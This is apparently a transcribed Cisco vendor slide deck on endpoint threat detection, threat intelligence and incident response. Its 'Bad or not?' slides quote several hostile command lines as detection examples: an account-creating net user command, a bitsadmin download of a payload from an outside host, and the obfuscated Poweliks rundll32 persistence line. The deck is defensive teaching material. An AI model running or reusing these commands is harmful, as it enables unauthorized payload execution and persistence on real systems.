Cisco Threat Response Architecture...Strategy Knowledge Features Detection Engines Coverage The...

© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Thorsten SchranzAdvanced Malware Prevention (AMP)2019-05-21

Cisco Threat Response ArchitectureWhy we need endpoint information


Behavior

Complexity

Company

ProductsMalware

Mindset

Strategy

Knowledge

Features

Detection Engines

Coverage

The history of Endpoint Protection

Probability

Detection?

Investigation?

Remediation?

…the Strategy, Products andMalware mustfit to be sucessful in theFuture…


From Event to Context – what can be includedEvent(s)Event from variouspoint of products.

Context

Includes much information. Events are one part only.


Sensor

SharingIntelligence

Sensor

Generates processable Data

Intelligence

Processes theSensor Data

Sharing

Automated sharing and processing the Analysis Data with other Intelligences or Products

What is Threat Intelligence – Key Components

Outcome

Analysis dataIOC dataBehavior InformationRelationship between Artifacts

Outcome

Sensor

Intelligence

Sharing


SharingThreat Information

Cisco Products

3rd Integrations

Intelligence to Intelligence OR Intelligence to Product

Sensorson a world wide base

Network (NetFlow)

Content (Web, E-mail)

DNS based

File Analysis

3rd Party Feeds

Trusted Sources

Intelligences

Co-Occurrence Model

Anomaly Detection, Trust Modeling, Events Classification, Relationship

Modeling

Correlations, Artificial Intelligence3rd Party Intelligence

Extensive Automation Framework, Large Scale Datamining, Big Data

Analytics and automated detection

Generating an understanding

real world secenarios

OnPremise Intelligences

Threat Intelligence


Postulation – Single spot is not enough

Known Good

Unknown

Known Bad

Complexity

Protection

+

Sensor

Intelligence

Single Spot 1:1 Analysis Multi Spot n:n Analysis

Endpoint

Mail

Web

IPS

NGFW

Protection


Postulation – Single spot is not enough


Single Spot(Sensor)

Multi Spot(Sensor)

Context

Includes much information. Events are one part only.

Classify basedon context


Endpoint Challenge Example – 1:1 Volume

Counters by Talos

• To much data to handle OnPremise

• To much data to handle directly on the client

• Threat Landscape is to complex to be handled on the endpoint only

• Another approach necessary

46M OS operation events

• 8.7M File events

• 11.5K Process events

• 114K Network events

• 35M Registry events

• 1.5M unique Samples Daily

• 20B Threats blocked/day

• 150B DNS entries daily

• 18.5B AMP queries/day

• 16B URLs/Web requests daily

• Threat Data processed: 120TB/day, 3.6PB/month

4,9

96,8

95,5

29

un

iqu

eh

ash

es

/ w

ee

k

20min. with Win 10(Procmon)

Result


46M OS operation events

• 8.7M File events

• 11.5K Process events

• 114K Network events

• 35M Registry events

• To much data to handle OnPremise

• To much data to handle directly on the client

• Threat Landscape is to complex to be handled on the endpoint only

• Another approach necessary

Endpoint Challenge Example – 1:n Complexity

Result20min. with Win 10

(Procmon)Counters by Talos

• 1.5M unique Samples Daily

• 20B Threats blocked/day

• 150B DNS entries daily

• 18.5B AMP queries/day

• 16B URLs/Web requests daily

• Threat Data processed: 120TB/day, 3.6PB/month

4,9

96,8

95,5

29

un

iqu

eh

ash

es

/ w

ee

k


Behavior Cluster

Malicious behaviour cluster including hundrets/thousands/million artifacts and also including one or more Threat Events

No Event

No Information

No Event

No Information

No Event

No Information

No Event

No Information

No Event

No Information

No Event

No Information

N + = X

Information

Threat Feeds

Intelligences

Analytic Systems

Researcher

Event

Event Details

Endpoint Chellange Example – 1:n Time Window


N + = X

Information

Threat Feeds

Intelligences

Analytic Systems

Researcher

Event

Event Details

Engines / Technologies

Protection Engines1 to X

Advanced Analytics

When needed?

Configuration

Endpoint Configuration

Cloud and Intelligence

When querying cloud

or other intelligences

Start

Something comes up

at the endpoint.

1 of 46 Million

Endpoint Challenge Example – 1:n Timeline


Bad or not?

C:\Windows\system32\cmd.exe /c net user 'jmaldive' /add

Windows command-lineLegitimes Windows Feature

User Mgmt.Tool

Argument: User mit Namenjmaldive hinzufügen


Bad or not?

"C:\Windows\System32\bitsadmin.exe" /transfer kiWDPYASe /download/priority foreground https://www.uz.gov.ua/en/:7777/content C:\trust.exe

Windows Update Command Line Arguments

Domain• Category: Business• Reputation: good• IP-Reputation: good• Status: Compromised?

Payload

http://trustme.at:7777/content


rundll32.exe javascript:\..\mshtml,RunHTMLApplication

;eval(epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu

)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5

cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*.replace(/./g,functi

on(_){return%20String.fromCharCode(_.charCodeAt()-1);}))

Bad or not?

WindowsComponent

Java

Command Line Argument

Poweliks is a fileless click-fraud malware

variant which resides within the registry. It

maintains persistence by creating a registry

key that makes use of rundll32 to execute

javascript code to read Powershell from the

Windows registry, which subsequently

executes portable executable code in memory.


What is part of my Security Architecture??

What happens

Threats?

Fileless ?

Legitimate OS Feature Usage?

What we talk about

Specific Single Topics!

E.g. Mimikatz

E.g. Detection Rate

** Source: https://mitre-attack.github.io/attack-navigator/enterprise/

Impact

Product Strategy

Solution Design

Correlations in SIEM

Mitre: Techniques linked to tactics**

11 Tactics

300 Techniques

….where we may not talk about….

Combinations of Tactics and Techniques

Timeline


Mitre ATT&CK

Mitre ATT&CK

Tactics linkedto techniques.

tactics persistence

initial-access

command-and-control

exfiltration

collection

lateral-movement

execution

credential-access

discovery

privilege-escalation

defense-evasion


Mitre ATT&CK

tactics persistence

.bash_profile and .bashrc

accessibility features

account manipulation

appcert dlls

appinint dlls

application shimming

authentication package

bits jobs

bootkit

browser extension

change default file association

component firmware

component object model highjacking

create account

dll search order hijacking

dylib hijacking

external remote access

file system permission weakness

hidden files and directories

hooking

hypervisor

Image file execution options

kernel modules and extension

launch agent

launch demon

lauchctl

lc_load_dylib_addition

local job sheduling

login item

logon script

lass driver

modify existing service

netsh helper dll

new service

office application startup

path interception

plist modification

port knocking

port monitors

rc.common

re-open applications

redundant access

registry run keys / startup folder

scheduled tasks

screensaver

security support provider

service registry permission weakness

setui and setgid

shortcut modification

sip and trust provider hijacking

startup items

system firmware

time providers

trap

valid accounts

web shell

windows management instrumentation

winlogon helper dll

bits jobs

Create account

Kernel modules and extensions

login script

new service

Scheduled tasks


What is part of my architecture??

Network Layer

NGFW

NGIPS E-MailWebThreat Grid

SecurityCameras

Thermostats

VoIP Phones

Printers

SOC

Monitoring and Threat Hunting

Windows command-line

Legitimate Windows FeatureC&C Info in Graphics

twitter.com

Mobile Users

Endpoint


The Race – Threats and Endpoint Strategy

Endpoint

#Legitimate OS Feature usage

#Command Line

#Behavior

#communication

#file creation

#fileless

#timline

#Just-in-Time

#artifacts

#payload


Endpoint Connector Endpoint Backend

Protection

Engines

Endpoint

Monitoring

Backend

Intelligence

Endpoint

TimeResource

Step 3: Endpoint Monitoring

Step 2: Backend Intelligence

Step 1: Endpoint Connector and Backend

Step 4: Moving Time and Resource intensive Processes from the Endpoint to the Backend

SOAR

and SIEM

Capabilities

Files

Process

Network

CMD

IOC

Step 5: Analysis 7x24x365 in Backend

Backend

Management

TimeResource



Endpoint Connector Endpoint Backend

Protection

Engines

Endpoint

Monitoring

Backend

Intelligence

SOAR

and SIEM

Capabilities

Files

Process

Network

CMD

IOC

Backend

Management

AMP Architecture and Platform

Threat

Intelligence

and

Research

Advanced

Analytics

Agentless

Detection

Mail

Web

IPS

NGFW

Perimeter

&

Network

3rd Party

Integration

Standards

APIs



Meraki Systems Manager

Tetration

Web Security

Email Security+CLOUD

Advanced ThreatAMP FOR ENDPOINTS • AMP CLOUD

THREAT GRID • COGNITIVE

Identity Services Engine +pxGRID

Umbrella+INVESTIGATE

Digital Network ArchitectureCATALYST • NEXUS • MERAKI MS

AIRONET/WLC • MERAKI MR

Firepower NGFW/NGIPS

Threat Response

Stealthwatch+CLOUD

Secure SD-WAN / RouterISR • CSR • ASR • vEDGE

MERAKI MX

Integrated Architecture

CloudlockThreat Response – The Future



Threat

Response

Threat

Intelligence

and

Research

Advanced

Analytics

Agentless

Detection

Mail

Web

IPS

NGFW

Perimeter

&

Network

^

3rd Party

Integration

Standards

APIs

AMP

for

Endpoints


Event

AnalysisReport Trajectory-

Threat Hunt


Web Analysis


Real World Example



Disk Memory

Sophisticated Malware Example – Infection/Protection (CL)

Code Installation

Malware installedCode

Injection

Binary Data

Dynamic created Content

Loaded from 3rd party

Obfuscated Content

Encrypted Content

Looks like “waste”

Partial Download

HTTPS Traffic

Hidden Protocol in HTTPS

Category: Business

Reputation: good

IP-Reputation: good

Status: Compromised

Good?

Malicious?

Unknown? WORKING Hidden, Stealthy, time-delayed

DECOY User

PREVENT Detection

New Sample in the world

In Memory

Evasion

Code generated

Code

Injection

.HLP .MSI

New Attack vector

New vulnerabilities

.SVC

.DLL=

.ISO.OCX.EXEews.exe

Dropped Payload,

autom. executed,

generates new Files

.EXE

OInfoP11.exe

created

OInfo11.ocx

created, holds

Decryption Info

OInfo11.iso

extracted,

encrypted,

compressed


Disk Memory


Code Installation


Injection

Binary Data



Obfuscated Content

Encrypted Content


Partial Download

HTTPS Traffic


Category: Business

Reputation: good

IP-Reputation: good

Status: Compromised

Good?

Malicious?


DECOY User

PREVENT Detection


In Memory

Evasion

Code generated

Code

Injection

.HLP .MSI

New Attack vector

New vulnerabilities

.SVC

.DLL=

.ISO.OCX.EXEews.exe

Dropped Payload,

autom. executed,

generates new Files

.EXE

OInfoP11.exe

created

OInfo11.ocx

created, holds

Decryption Info

OInfo11.iso

extracted,

encrypted,

compressed

Event

OnAcces Scan?

OnDemand Scan?

Event not handled?Behavior Cluster

Malicious behaviour cluster including hundrets/thousands/million artifacts and also including one or more Threat Events


Disk Memory

Code Installation


Injection

Binary Data



Obfuscated Content

Encrypted Content


Partial Download

HTTPS Traffic


Category: Business

Reputation: good

IP-Reputation: good

Status: Compromised

Good?

Malicious?


DECOY User

PREVENT Detection


In Memory

Entrenchment

Code generated

Code

Injection

.HLP .MSI

New Attack vector

New vulnerabilities

.SVC

.DLL=

.ISO.OCX.EXEews.exe

Dropped Payload,

autom. executed,

generates new Files

.EXE

OInfoP11.exe

created

OInfo11.ocx

created, holds

Decryption Info

OInfo11.iso

extracted,

encrypted,

compressed

Status: Clean

No Sample, no Signature

Infection Vector unknown

Time-to-detect infected host

Single File not malicious

C&C Communication

Data Loss

Which Artifacts are left for investigation?

Which Information is available for investigation?

Artifact Dependencies

File less and persistant



Disk Memory

Code Installation


Injection

Binary Data



Obfuscated Content

Encrypted Content


Partial Download

HTTPS Traffic


Category: Business

Reputation: good

IP-Reputation: good

Status: Compromised

In Memory

Evasion

Code generated

Code

Injection

.HLP .MSI

.SVC

.DLL=

.ISO.OCX.EXEews.exe

Dropped Payload,

autom. executed,

generates new Files

.EXE

OInfoP11.exe

created

OInfo11.ocx

created, holds

Decryption Info

OInfo11.iso

extracted,

encrypted,

compressed

Endpoint Detection and Response Approach

Monitoring Engine

Disk Activity

Process Activity

Command Line Monitoring

ConnectedIntelligences

Storess and processes

Monitoring data

30


31

Disk Memory

Code Installation


Injection

Binary Data



Obfuscated Content

Encrypted Content


Partial Download

HTTPS Traffic


Category: Business

Reputation: good

IP-Reputation: good

Status: Compromised

In Memory

Entrenchment

Code generated

Code

Injection

.HLP .MSI

.SVC

.DLL=

.ISO.OCX.EXEews.exe

Dropped Payload,

autom. executed,

generates new Files

.EXE

OInfoP11.exe

created

OInfo11.ocx

created, holds

Decryption Info

OInfo11.iso

extracted,

encrypted,

compressed

Status: Clean




Monitoring data

Monitoring Engine

Disk Activity

Process Activity



32

Disk Memory

Code Installation


Injection

Category: Business

Reputation: good

IP-Reputation: good

In Memory

Entrenchment

Code generated

Code

Injection

.HLP .MSI

.SVC

.DLL=

.ISO.OCX.EXEews.exe

Dropped Payload,

autom. executed,

generates new Files

.EXE

OInfoP11.exe

created

OInfo11.ocx

created, holds

Decryption Info

OInfo11.iso

extracted,

encrypted,

compressed

Status: Clean




Monitoring data

Monitoring Engine

Disk Activity

Process Activity


THREAT Response Architecture

Endpoint Architecute

Files

Process

Network

CMD

IOC

SOAR

and SIEM

Capabilities

Backend

Management


IOC Event Detail Examples

Generic IOC: Powershell Download

Monitoring (Sensor)

Intelligence


Incident Management withoutCisco Threat Response


Deliver

System back to user

Deliver to User

Format Device

Find

Where, who, howwhen….

Find the Malware

Disk Forensics

OnDemand ScanManual SearchKnowledge?

Full Disk Forensics

Availability

Client not availableUser on PTONo Sensordifferent Department

Availability

Ticketing

Defined Process?

Open Ticket

Verify

Verify the event e.g. if further analysis is necessary

Verify

Searching

Search in Siem or other available InformationSourse, Logfiles andso on.

Search in SIEM

Alert

Malware Alert from a single point of product

Malware Alert

Incident Response (IR) without Cisco Threat Response (CTR)

Timeline (Hours? Days? Weeks?)

Format

Most information lost


Q1 - Commodity/Targeted?Q2 - Persistency?Q3 - Ransom/Backups?Q4 - Lateral movement?Q5 - Clean/Format?

Steps

What to do next?

Next Steps

a.ExeHash: 92a6…………7a

Result

Result

Analysis Tools

Process Explorer

Wireshark

Full Disk Forensics

Other Tools

ToolsSearch on ClientSearch in SIEM

Q1 - DHCP info?Q2 - AD info?Q3 - CMDB info?Q4 - Vulnerability info?Q5 - AV info?Q6 - Who is doing the C&C?

Alert by Next-Gen Network• C&C Traffic Detected:• Destination : 52.28.249.128Threat

Intelligence?• Source : 10.0.2.11Q, Q, Q, Q, Q, Q, ?• Pcap Capture available?

C&C Traffic Alert

Timeline (Hours? Days? Weeks?)

IR without CTR – C&C traffic alert!!

Searching

Sources?Intelligences?Correlations?

Payload

OS

Hardware


Visibility with EPP ApproachD

evic

e T

raje

cto

ry

Worstcase – Single Threat Event

Event does not show what really happened

Detection is often not Real-Time

No dependencies between artifacts and behaviour

Missing Information for OnPremise Intelligence

Missing legitimate OS functions and behaviour (chkdsk)

Threat Event?

Threat Event?Threat Event?


Understand Threat with EPP/EDR approachD

evic

e T

raje

cto

ry

IOC Vulnerability

Application with vulnerability

Execution

Application X was executed by application Y

PDFcreated

Network

Established networkconnections

Activity

Create, execute and network connection

Activity

Malicious File starts chkdsk.exe

Chkdsk.exe

Network connection and drops/executes a malicious file.


Demo: from Webtraffic to the endpoint



Thank you…the Strategy, Products and Malware must

fit to be successful in the future..

cisco.com/go/ampendpoint

Cisco Threat Response Architecture...Strategy Knowledge Features Detection Engines Coverage The...

Documents

Transcript of Cisco Threat Response Architecture...Strategy Knowledge Features Detection Engines Coverage The...